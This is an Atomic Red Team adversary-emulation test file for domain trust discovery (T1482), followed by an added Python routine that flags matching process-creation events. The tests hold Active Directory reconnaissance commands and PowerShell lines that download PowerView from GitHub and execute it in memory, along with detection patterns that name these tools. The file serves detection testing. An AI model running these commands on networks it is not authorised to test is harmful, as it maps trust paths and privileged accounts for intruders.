06ebf05785
* Added the "-c" option to adfind commands. This will cause it to print a count of the returned objects instead of the actual objects. This is very useful for large environments and allows it to run quicker without actually exposing any sensitive information.
* Adding the code to allow specifying optional arguments at runtime instead of hardcoding the -c to allow more flexibility per this request: https://github.com/redcanaryco/atomic-red-team/pull/2645#pullrequestreview-1795339526

---------

Co-authored-by: dwhite <n/a>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Co-authored-by: dwhite9 <n@a>
170 lines
8.3 KiB
YAML
attack_technique: T1482
display_name: Domain Trust Discovery
atomic_tests:
- name: Windows - Discover domain trusts with dsquery
  auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f
  description: |
    Uses the dsquery command to discover domain trusts.
    Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
  supported_platforms:
  - windows
  executor:
    command: |
      dsquery * -filter "(objectClass=trustedDomain)" -attr *
    name: command_prompt
- name: Windows - Discover domain trusts with nltest
  auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe
  description: |
    Uses the nltest command to discover domain trusts.
    Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role.
    This technique has been used by the Trickbot malware family.
  supported_platforms:
  - windows
  dependencies:
  - description: |
      nltest.exe from RSAT must be present on disk
    prereq_command: |
      WHERE nltest.exe >NUL 2>&1
    get_prereq_command: |
      echo Sorry RSAT must be installed manually
  executor:
    command: |
      nltest /domain_trusts
      nltest /trusted_domains
    name: command_prompt
- name: Powershell enumerate domains and forests
  auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
  description: |
    Use powershell to enumerate AD information.
    Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      PowerView PowerShell script must exist on disk
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
  - description: |
      RSAT PowerShell AD admin cmdlets must be installed
    prereq_command: |
      if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }
    get_prereq_command: |
      Write-Host "Sorry RSAT must be installed manually"
  executor:
    command: |
      Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
      Get-NetDomainTrust
      Get-NetForestTrust
      Get-ADDomain
      Get-ADGroupMember Administrators -Recursive
      ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
    name: powershell
- name: Adfind - Enumerate Active Directory OUs
  auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec
  description: |
    Adfind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs.
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
  - windows
  input_arguments:
    optional_args:
      description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
      type: string
      default:
  dependency_executor_name: powershell
  dependencies:
  - description: |
      AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
  executor:
    command: |
      "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=organizationalUnit) #{optional_args}
    name: command_prompt
- name: Adfind - Enumerate Active Directory Trusts
  auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834
  description: |
    Adfind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts.
    reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
  supported_platforms:
  - windows
  input_arguments:
    optional_args:
      description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
      type: string
      default:
  dependency_executor_name: powershell
  dependencies:
  - description: |
      AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
  executor:
    command: |
      "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -gcb -sc trustdmp
    name: command_prompt

- name: Get-DomainTrust with PowerView
  auto_generated_guid: f974894c-5991-4b19-aaf5-7cc2fe298c5d
  description: |
    Utilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed.
  supported_platforms:
  - windows
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose
    name: powershell

- name: Get-ForestTrust with PowerView
  auto_generated_guid: 58ed10e8-0738-4651-8408-3a3e9a526279
  description: |
    Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.
  supported_platforms:
  - windows
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose
    name: powershell

- name: TruffleSnout - Listing AD Infrastructure
  auto_generated_guid: ea1b4f2d-5b82-4006-b64f-f2845608a3bf
  description: |
    Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
  supported_platforms:
  - windows
  input_arguments:
    trufflesnout_path:
      description: Path to the TruffleSnout executable
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe
    domain:
      description: Domain name to search on
      type: string
      default: '%userdomain%'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})
    prereq_command: |
      if (Test-Path "#{trufflesnout_path}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -ItemType Directory (Split-Path "#{trufflesnout_path}") -Force | Out-Null
      Invoke-WebRequest -Uri "https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe" -OutFile "#{trufflesnout_path}"
  executor:
    command: |
      "#{trufflesnout_path}" forest -n #{domain}
      "#{trufflesnout_path}" domain -n #{domain}
    name: command_prompt
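The commands in these tests are what a defender validates detection coverage against. The following is an added example, not part of the Atomic Red Team file: a small triage routine that matches process-creation records (constructed here in the shape of Sysmon Event ID 1 Image/CommandLine fields) against rules derived only from the command lines above, including the `-c` count flag the commit adds to AdFind.

```python
"""Process-creation triage for the T1482 tests above (added example, not Atomic Red Team code).

Rules are derived only from the command lines in the test file; the events are
constructed records in the shape of Sysmon Event ID 1 (Image, CommandLine) fields.
"""
import re

# (rule name, image basename or None for any image, regex over the command line).
# The AdFind rules ignore the image name on purpose: the binary is often renamed,
# while its argument syntax (-sc trustdmp, -f (objectcategory=...)) is distinctive.
RULES = [
    ("dsquery trustedDomain filter", "dsquery.exe", re.compile(r"objectClass=trustedDomain", re.I)),
    ("nltest trust enumeration", "nltest.exe", re.compile(r"/(domain_trusts|trusted_domains)\b", re.I)),
    ("AdFind trust dump", None, re.compile(r"-sc\s+trustdmp\b", re.I)),
    ("AdFind OU enumeration", None, re.compile(r"objectcategory=organizationalUnit", re.I)),
    ("PowerView trust cmdlets", "powershell.exe", re.compile(r"Get-(Net)?(Domain|Forest)Trust\b", re.I)),
    ("TruffleSnout forest/domain listing", "trufflesnout.exe", re.compile(r"\b(forest|domain)\s+-n\b", re.I)),
]


def classify(event):
    """Return the names of every rule the event matches."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    return [name for name, img, rx in RULES
            if (img is None or image == img) and rx.search(event["CommandLine"])]


def scan(events):
    """Return (command line, matched rules) for each event that trips at least one rule."""
    hits = []
    for event in events:
        matched = classify(event)
        if matched:
            hits.append((event["CommandLine"], matched))
    return hits


# Constructed sample events. The first AdFind record carries the -c count flag from the
# commit message; the renamed a.exe record shows why the AdFind rules do not key on Image.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\dsquery.exe",
     "CommandLine": 'dsquery * -filter "(objectClass=trustedDomain)" -attr *'},
    {"Image": r"C:\Windows\System32\nltest.exe", "CommandLine": "nltest /domain_trusts"},
    {"Image": r"C:\Windows\System32\nltest.exe", "CommandLine": "nltest /dsgetdc:corp"},  # routine DC lookup
    {"Image": r"C:\Users\u\AdFind.exe", "CommandLine": r'"C:\Users\u\AdFind.exe" -c -gcb -sc trustdmp'},
    {"Image": r"C:\Temp\a.exe", "CommandLine": r"C:\Temp\a.exe -f (objectcategory=organizationalUnit)"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-DomainTrust -Verbose"},
    {"Image": r"C:\Tools\TruffleSnout.exe", "CommandLine": r'"C:\Tools\TruffleSnout.exe" forest -n CORP'},
]

if __name__ == "__main__":
    for cmd, matched in scan(SAMPLE_EVENTS):
        print(f"{', '.join(matched)}: {cmd}")
```

The `nltest /dsgetdc` record is deliberately left unmatched: nltest is also used for routine domain-controller lookups, so a rule keyed on the image alone would be noisy.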